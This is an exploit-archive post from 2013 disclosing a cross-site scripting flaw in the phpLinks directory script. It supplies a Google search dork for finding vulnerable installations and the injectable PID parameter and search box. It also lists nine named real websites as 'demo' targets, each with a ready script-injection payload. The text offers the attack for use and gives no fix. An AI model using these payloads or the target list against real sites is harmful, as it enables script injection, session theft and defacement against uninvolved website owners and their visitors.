Home / exploits phpLinks Cross Site Scripting
Posted on 17 September 2013
#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # Exploit Title: PhpLinks Cross Site Scripting Vulnerability # Date: 2013 15 September # Author: Arsan # Vendor Homepage: www.newphplinks.com # Version : All Version # Tested on: Linux & Windows # Category: webapps # Google Keywords: inurl:"/index.php?PID=" intext:"Powered By phpLinks" # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Exploit : # # http://<server>/index.php?PID=[XSS] # http://<server>/[XSS In SearchBox] # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Demo : # # www.net-sleuth.com/index.php?PID=5"><script>alert(/Arsan/)</script> # www.eheli.at/phplinks/index.php?PID=5"><script>alert(/Arsan/)</script> # www.ingegneriambientali.it/cercambiente/index.php?PID=5"><script>alert(/Arsan/)</script> # www.touristinfo.it/index.php?PID=205"><script>alert(/Arsan/)</script> # www.lupus.france-timbres.net/index.php?PID=10"><script>alert(/Arsan/)</script> # www.links.svalbard.com/index.php?PID=3"><script>alert(/Arsan/)</script> # www.remodelnet.com/links/index.php?PID=6"><script>alert(/Arsan/)</script> # www.dietrich.kracht.free.fr/phplinks/index.php?PID=4"><script>alert(/Arsan/)</script> # www.myav.com.tw/avlinks/index.php?PID=5"><script>alert(/Arsan/)</script> # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # # [+] Contact Me : # # Arsan.Blackhat@gmail.com # Twitter.com/ArsanBlackhat # #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~# # I L0ve Inj3ct0r Team #~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#~#
